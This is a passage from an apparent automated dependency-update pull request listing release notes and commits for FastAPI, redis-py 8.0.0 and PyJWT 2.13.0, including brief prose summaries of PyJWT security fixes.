href=\"https://redirect.github.com/fastapi/fastapi/pull/15553\"\u003e#15553\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Fix image URLs in \u003ccode\u003eindex.md\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15534\"\u003e#15534\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e✏️ Fix Azkaban spelling typo in \u003ccode\u003evirtual-environments.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15463\"\u003e#15463\u003c/a\u003e by \u003ca href=\"https://github.com/isaacbernat\"\u003e\u003ccode\u003e@​isaacbernat\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Improve layout and styling. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15462\"\u003e#15462\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Refactor opinions section with interactive tabs and new logos. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15458\"\u003e#15458\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add FastAPI Conf '26 announcement to docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15457\"\u003e#15457\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eTranslations\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e🌐 Improve translation consistency in \u003ccode\u003e‎docs/pt/docs/advanced/generate-clients.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15456\"\u003e#15456\u003c/a\u003e by \u003ca href=\"https://github.com/Will-thom\"\u003e\u003ccode\u003e@​Will-thom\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ja (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15530\"\u003e#15530\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for uk (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15529\"\u003e#15529\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for pt (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15528\"\u003e#15528\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for de (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15527\"\u003e#15527\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for tr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15526\"\u003e#15526\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ko (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15525\"\u003e#15525\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh-hant (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15524\"\u003e#15524\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for fr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15522\"\u003e#15522\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for es (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15523\"\u003e#15523\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15520\"\u003e#15520\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ru (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15521\"\u003e#15521\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Fix typos in Spanish LLM-prompt. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15472\"\u003e#15472\u003c/a\u003e by \u003ca href=\"https://github.com/crr004\"\u003e\u003ccode\u003e@​crr004\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e✅ Update tests, don't double dispose the engine. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15587\"\u003e#15587\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⚡️ Speed up test suite via caching and fixture scopes to make it ~24% faster. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/13583\"\u003e#13583\u003c/a\u003e by \u003ca href=\"https://github.com/dikos1337\"\u003e\u003ccode\u003e@​dikos1337\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔥 Remove config files now in central GitHub repo. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15585\"\u003e#15585\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump urllib3 from 2.6.3 to 2.7.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15502\"\u003e#15502\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump idna from 3.11 to 3.15. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15565\"\u003e#15565\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump cloudflare/wrangler-action from 3.15.0 to 4.0.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15571\"\u003e#15571\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔧 Migrate docs from MkDocs to Zensical. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15563\"\u003e#15563\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔒️ Only allow team members to modify dependencies. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15548\"\u003e#15548\u003c/a\u003e by \u003ca href=\"https://github.com/svlandeg\"\u003e\u003ccode\u003e@​svlandeg\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/82064857539e6286522c347b4b11331b48dd2378\"\u003e\u003ccode\u003e8206485\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c910e0139f983d0e04e2d1d235cd71803afeae34\"\u003e\u003ccode\u003ec910e01\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/063b5bf582d31fb155cc6bc6f88cf512329d0fd5\"\u003e\u003ccode\u003e063b5bf\u003c/code\u003e\u003c/a\u003e ♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (th...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/22b02e26f9e8c7e32bd8266e2b0ebe8bb3a0db2b\"\u003e\u003ccode\u003e22b02e2\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3b252a2a22ba27a8ab83d6bde7d9cddbc5bf738e\"\u003e\u003ccode\u003e3b252a2\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c7fb7851b3389f24c51701d705458989be53ccbb\"\u003e\u003ccode\u003ec7fb785\u003c/code\u003e\u003c/a\u003e ♻️ Validate Server Sent Event fields to avoid applications from sending broke...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/cb83b83dcf78eab4ea17d504db5abcda705fbdc4\"\u003e\u003ccode\u003ecb83b83\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/00f805cec94c0bf48c1f9a563535a3ab2e6f90ab\"\u003e\u003ccode\u003e00f805c\u003c/code\u003e\u003c/a\u003e ✅ Update tests, don't double dispose the engine (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15587\"\u003e#15587\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3675137523dc167981aa3a3c44599b4f3079ccd8\"\u003e\u003ccode\u003e3675137\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/7b57e42986bb4d40c9eb6580537d13fb8e76097e\"\u003e\u003ccode\u003e7b57e42\u003c/code\u003e\u003c/a\u003e 📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15464\"\u003e#15464\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fastapi/fastapi/compare/0.135.1...0.136.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `redis` from 7.3.0 to 8.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/redis/redis-py/releases\"\u003eredis's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.0.0\u003c/h2\u003e\n\u003ch1\u003eChanges\u003c/h1\u003e\n\u003ch2\u003e🚀 Highlights\u003c/h2\u003e\n\u003ch3\u003eAsync Cluster PubSub\u003c/h3\u003e\n\u003cp\u003eThis release introduces full \u003cstrong\u003easyncio Cluster PubSub support\u003c/strong\u003e, bringing shard-channel capabilities (\u003ccode\u003eSSUBSCRIBE\u003c/code\u003e, \u003ccode\u003eSUNSUBSCRIBE\u003c/code\u003e, \u003ccode\u003eSPUBLISH\u003c/code\u003e) to the async \u003ccode\u003eRedisCluster\u003c/code\u003e client. The new \u003ccode\u003eClusterPubSub\u003c/code\u003e class in \u003ccode\u003eredis.asyncio.cluster\u003c/code\u003e automatically routes shard-channel subscriptions to the correct cluster node based on key-slot hashing, manages per-node PubSub connections, and supports round-robin message retrieval across nodes. Users can create a cluster pubsub instance via \u003ccode\u003eRedisCluster.pubsub()\u003c/code\u003e and use \u003ccode\u003essubscribe()\u003c/code\u003e, \u003ccode\u003esunsubscribe()\u003c/code\u003e, and \u003ccode\u003eget_sharded_message()\u003c/code\u003e just as they would with the sync cluster client.\u003c/p\u003e\n\u003ch3\u003eKeyspace and subkey notifications\u003c/h3\u003e\n\u003cp\u003eRedis Keyspace Notifications are now supported for standalone and cluster deployments in both sync and async modes. New classes — \u003ccode\u003eKeyspaceNotifications\u003c/code\u003e, \u003ccode\u003eClusterKeyspaceNotifications\u003c/code\u003e, \u003ccode\u003eAsyncKeyspaceNotifications\u003c/code\u003e, and \u003ccode\u003eAsyncClusterKeyspaceNotifications\u003c/code\u003e — provide a high-level API for keyspace/keyevent subscriptions and subkey notification families: \u003ccode\u003esubkeyspace\u003c/code\u003e, \u003ccode\u003esubkeyevent\u003c/code\u003e, \u003ccode\u003esubkeyspaceitem\u003c/code\u003e, and \u003ccode\u003esubkeyspaceevent\u003c/code\u003e. Convenience methods like \u003ccode\u003esubscribe_keyspace()\u003c/code\u003e, \u003ccode\u003esubscribe_keyevent()\u003c/code\u003e, \u003ccode\u003esubscribe_subkeyspace()\u003c/code\u003e, \u003ccode\u003esubscribe_subkeyevent()\u003c/code\u003e, \u003ccode\u003esubscribe_subkeyspaceitem()\u003c/code\u003e, and \u003ccode\u003esubscribe_subkeyspaceevent()\u003c/code\u003e simplify common patterns, with channel classes for both key and subkey channels.\u003c/p\u003e\n\u003cp\u003eIn cluster mode, subscriptions are managed across primary nodes because each node emits notifications only for keys it owns, with built-in topology-change handling. Sync \u003ccode\u003erun_in_thread()\u003c/code\u003e and async \u003ccode\u003elisten()\u003c/code\u003e workflows are supported.\u003c/p\u003e\n\u003ch3\u003eRedis Array commands(\u003ca href=\"https://redis.io/docs/latest/develop/data-types/arrays/\"\u003ehttps://redis.io/docs/latest/develop/data-types/arrays/\u003c/a\u003e)\u003c/h3\u003e\n\u003cp\u003eredis-py now supports \u003ca href=\"https://redis.io/docs/latest/develop/data-types/arrays/\"\u003eRedis Arrays\u003c/a\u003e, a preview Redis data type for sparse, index-addressable sequences of strings. New \u003ccode\u003eAR*\u003c/code\u003e command helpers cover indexed reads/writes, range scans, deletion, cursor-based insertion, ring-buffer writes, metadata, text search, and aggregation, including \u003ccode\u003eARGET\u003c/code\u003e, \u003ccode\u003eARSET\u003c/code\u003e, \u003ccode\u003eARMGET\u003c/code\u003e, \u003ccode\u003eARMSET\u003c/code\u003e, \u003ccode\u003eARSCAN\u003c/code\u003e, \u003ccode\u003eARGREP\u003c/code\u003e, \u003ccode\u003eARRING\u003c/code\u003e, and \u003ccode\u003eAROP\u003c/code\u003e.\u003c/p\u003e\n\u003ch3\u003eType Hints Improvements (breaking changes)\u003c/h3\u003e\n\u003cp\u003eThe \u003ccode\u003e@overload\u003c/code\u003e pattern has been applied systematically across \u003cstrong\u003ecore commands\u003c/strong\u003e (\u003ccode\u003ecore.py\u003c/code\u003e), \u003cstrong\u003eVectorSet commands\u003c/strong\u003e, and \u003cstrong\u003emodule commands\u003c/strong\u003e (Search, JSON, TimeSeries, Bloom filters) to provide distinct return types for sync and async clients. Previously, methods returned a combined \u003ccode\u003eResponseT\u003c/code\u003e (i.e., \u003ccode\u003eUnion[Awaitable[Any], Any]\u003c/code\u003e), which caused static analysis tools like mypy and Pyright to flag false positives. Now, sync clients see concrete return types (e.g., \u003ccode\u003eint\u003c/code\u003e, \u003ccode\u003ebool\u003c/code\u003e, \u003ccode\u003elist[str]\u003c/code\u003e) while async clients see \u003ccode\u003eAwaitable[...]\u003c/code\u003e wrappers. This is a \u003cstrong\u003ebreaking change for type-checking only\u003c/strong\u003e—runtime behavior is unchanged, but code relying on the old union return types in type annotations may need updates. Two new protocol types, \u003ccode\u003eSyncClientProtocol\u003c/code\u003e and \u003ccode\u003eAsyncClientProtocol\u003c/code\u003e, are used in overload signatures to enable this distinction.\u003c/p\u003e\n\u003ch3\u003eRESP3 by default with opt-in unified responses\u003c/h3\u003e\n\u003cp\u003eredis-py 8.0.0 now uses RESP3 on the wire by default while preserving legacy RESP2-compatible Python response shapes for existing applications (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4052\"\u003e#4052\u003c/a\u003e). Protocol-independent unified response shapes are available by setting \u003ccode\u003elegacy_responses=False\u003c/code\u003e, so affected commands return the same Python structure with RESP2 or RESP3.\u003c/p\u003e\n\u003cp\u003eUse \u003ccode\u003eprotocol=2\u003c/code\u003e to force RESP2 on the wire, \u003ccode\u003eprotocol=3\u003c/code\u003e to opt into native RESP3 response shapes, or \u003ccode\u003elegacy_responses=False\u003c/code\u003e to migrate to unified responses. See \u003ca href=\"https://github.com/redis/redis-py/blob/HEAD/docs/unified_responses.rst\"\u003e\u003ccode\u003ehttps://github.com/redis/redis-py/blob/HEAD/docs/unified_responses.rst\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/redis/redis-py/blob/HEAD/specs/unified_responses_migration_guide.md\"\u003e\u003ccode\u003ehttps://github.com/redis/redis-py/blob/HEAD/specs/unified_responses_migration_guide.md\u003c/code\u003e\u003c/a\u003e for the affected commands and migration details.\u003c/p\u003e\n\u003ch3\u003eConnection and retry defaults\u003c/h3\u003e\n\u003cp\u003eDefault connection settings were updated: \u003ccode\u003esocket_timeout\u003c/code\u003e and \u003ccode\u003esocket_connect_timeout\u003c/code\u003e now default to 5 seconds, TCP keepalive is enabled by default, socket reads use a 32 KB buffer, connection pools default to \u003ccode\u003emax_connections=100\u003c/code\u003e, and retry defaults now use 10 attempts with exponential jitter backoff.\u003c/p\u003e\n\u003cp\u003eNote: \u003ccode\u003esocket_timeout\u003c/code\u003e can affect blocking commands such as \u003ccode\u003eBLPOP\u003c/code\u003e/\u003ccode\u003eBRPOP\u003c/code\u003e; if a command blocks longer than the client socket timeout, it may raise \u003ccode\u003eTimeoutError\u003c/code\u003e before the command timeout elapses (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/2807\"\u003e#2807\u003c/a\u003e).\u003c/p\u003e\n\u003ch2\u003e🧪 Experimental Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for new array commands (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4055\"\u003e#4055\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Cluster PubSub in asyncio (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/3736\"\u003e#3736\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd Redis Keyspace Notifications Support for Redis Cluster (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/3962\"\u003e#3962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd random load balancing strategy which allows for use of the primary (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4027\"\u003e#4027\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd FPHA (floating-point homogeneous array) arg support to JSON.SET (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4011\"\u003e#4011\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdded custom Claude command + XNACK command support (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4030\"\u003e#4030\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdding Time Series Multiple Aggregators support (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4035\"\u003e#4035\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdding support for new COUNT aggregator for some sorted set commands - ZINTER, ZINTERSTORE, ZUNION, ZUNIONSTORE (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4034\"\u003e#4034\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdding support for new INCREX command (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4067\"\u003e#4067\u003c/a\u003e \u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4077\"\u003e#4077\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd support for PubSub subscriptions with binary channel names and handlers (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4068\"\u003e#4068\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/redis/redis-py/commit/733f80ec633d6a772a6e1ccb1c0cca6fc1afb4b6\"\u003e\u003ccode\u003e733f80e\u003c/code\u003e\u003c/a\u003e Updates in default connection and retry settings (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4082\"\u003e#4082\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/redis/redis-py/commit/a68a16c296591e902d0c749d31781550048f280f\"\u003e\u003ccode\u003ea68a16c\u003c/code\u003e\u003c/a\u003e Updating Redis supported versions in README.md and lib version to 8.0.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/redis/redis-py/commit/43a41d3d2956aa69eb0041655067ffaaaf23c6c3\"\u003e\u003ccode\u003e43a41d3\u003c/code\u003e\u003c/a\u003e Updating INCREX command arg - SATURATE now controls overflow behaviour (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4077\"\u003e#4077\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/redis/redis-py/commit/1496deba3801605cb123cb1b67adda50e85cd1e5\"\u003e\u003ccode\u003e1496deb\u003c/code\u003e\u003c/a\u003e Preserve explicit None for client metadata config (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4081\"\u003e#4081\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/redis/redis-py/commit/57dc08c550f82086afeaa68a7cd7e5df356f7217\"\u003e\u003ccode\u003e57dc08c\u003c/code\u003e\u003c/a\u003e Avoid zero-timeout async reads in hiredis connections readiness checks and re...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/redis/redis-py/commit/cd54ddd25aa307dc7f05bc0e4387cfc294c0a4c8\"\u003e\u003ccode\u003ecd54ddd\u003c/code\u003e\u003c/a\u003e fix(typing): correct type annotation for XReadResponse (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4046\"\u003e#4046\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/redis/redis-py/commit/ab2d41fcf0f9477ac788822d7c430004076a27f2\"\u003e\u003ccode\u003eab2d41f\u003c/code\u003e\u003c/a\u003e Add support for PubSub subscriptions with binary channel names and handlers (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/redis/redis-py/commit/ef24dc99b6f2aa9507f19aa4ce4be37745ed6c77\"\u003e\u003ccode\u003eef24dc9\u003c/code\u003e\u003c/a\u003e Randomize cluster startup node order during topology refresh (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4060\"\u003e#4060\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/redis/redis-py/commit/b604015aeb5abce4b576f9dc54ffe30a3f1ba8c6\"\u003e\u003ccode\u003eb604015\u003c/code\u003e\u003c/a\u003e Add CLAUDE.md and /sync-claude-md skill for managing (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4066\"\u003e#4066\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/redis/redis-py/commit/2b8b4fcc9986fbc1f188cc6a355d12eec814ee90\"\u003e\u003ccode\u003e2b8b4fc\u003c/code\u003e\u003c/a\u003e Fix flaky tests (\u003ca href=\"https://redirect.github.com/redis/redis-py/issues/4071\"\u003e#4071\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/redis/redis-py/compare/v7.3.0...v8.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pyjwt` from 2.12.1 to 2.13.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca 